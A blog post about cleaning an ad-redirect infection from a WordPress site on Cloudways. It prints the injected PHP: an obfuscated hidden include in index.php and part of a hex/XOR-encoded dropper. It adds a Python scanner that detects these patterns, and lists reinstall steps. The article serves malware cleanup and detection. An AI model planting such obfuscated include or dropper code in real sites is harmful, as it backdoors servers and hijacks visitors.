Today, I encountered a client's website hosted on a Cloudways server. The WordPress site automatically redirects to third-party advertising websites when accessed via mobile, which is a clear symptom of a virus infection. This article documents how to clean this ad-redirect virus.
The principle is similar to previous ad-redirect viruses: they exploit vulnerabilities in plugins or WordPress itself to upload malicious files to the server. For example, in the index.php file, we discovered this string of encrypted code.
<?php
/*85ba2*/
@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");
/*85ba2*/
This include points to a file named .c963ccee.oti, whose partial content is as follows:
<?php
$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;
$o8dk17mz = "";
$o8dk17mz .= $ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E");
$o8dk17mz .= $ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");
The code is too long to decrypt completely. However, based on Naiba's experience, it's clear this is a virus file without needing decryption. Normal WordPress program files are open-source and do not contain encrypted code.
Besides this one, there are other interfering files in the folder, which won't be listed one by one here.
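To locate the other files carrying the same markers, the following scanner (an added example, not code from the original article) checks for the two patterns shown above: an include whose path is hidden with \xNN escapes, and a function name built by XOR-ing a pack('H*', ...) blob. The function names and regular expressions are this example's own assumptions; the two sample strings are copied from the article.

```python
import re
from pathlib import Path

# include/require of a double-quoted path (PHP expands \xNN only in double quotes)
INCLUDE_RE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)
HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})")
# pack('H*', HEX); $v = 'KEY'; $v = $v ^ $w;  -> function name hidden by XOR
PACK_XOR_RE = re.compile(
    r"pack\('H\*',\s*'((?:[0-9A-Fa-f]{2})+)'\);\s*\$\w+\s*=\s*'([^']+)';"
    r"\s*\$\w+\s*=\s*\$\w+\s*\^\s*\$\w+")

# Sample lines copied from the article (the "**" masking is the article's own).
SAMPLE_INDEX = r'@include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti");'
SAMPLE_DROPPER = "$om12efh = pack('H*', '0a0041131e05535551575008'); $ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh;"


def decode_php_hex(s):
    """Expand PHP \\xNN escapes the way a double-quoted string would."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def inspect_php(text):
    """Return (kind, detail) findings for one file's contents."""
    findings = []
    for m in INCLUDE_RE.finditer(text):
        raw = m.group(1)
        if HEX_ESC_RE.search(raw):  # hex-escaped include path: treated as suspicious here
            path = decode_php_hex(raw)
            hidden = path.rsplit("/", 1)[-1].startswith(".")
            findings.append(("hidden-include" if hidden else "escaped-include", path))
    for m in PACK_XOR_RE.finditer(text):
        blob, key = bytes.fromhex(m.group(1)), m.group(2).encode("latin-1")
        # PHP string XOR stops at the shorter operand, as zip() does
        name = bytes(a ^ b for a, b in zip(blob, key)).decode("latin-1")
        findings.append(("xor-function-name", name))
    return findings


def scan_tree(root):
    """Inspect every .php file and every dotfile under root; map path -> findings."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and (p.suffix.lower() == ".php" or p.name.startswith(".")):
            found = inspect_php(p.read_text(encoding="utf-8", errors="ignore"))
            if found:
                hits[str(p)] = found
    return hits
```

Run scan_tree over a local copy of the backup and again over the rebuilt site, including the preserved wp-content/uploads folder. On the article's dropper line the XOR recovers the function name rawurldecode.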
Once the infection method is analyzed, the solution is simple: delete the virus files and replace them with clean ones.
The simplest method is to delete all WordPress files and reinstall. Of course, files under the uploads directory must be manually preserved; otherwise, all website images will be lost after reinstallation.
Cloudways is a managed VPS, so users do not have the highest permissions. Using SFTP or SSH, you still lack the permission to delete virus files, so you need to contact customer support for assistance.
Finally, the steps to handle a virus-infected website on Cloudways:
- Back up the infected website data for reference;
- Delete all files and folders except the wp-content/uploads folder (requires contacting customer support for deletion, as permissions are insufficient).
- Re-download the WordPress installation package and install the WordPress website;
- Reinstall the previous Theme and Plugin.
After completing these operations, the virus files will be gone. If you can't handle it, you can pay Naiba to handle it.
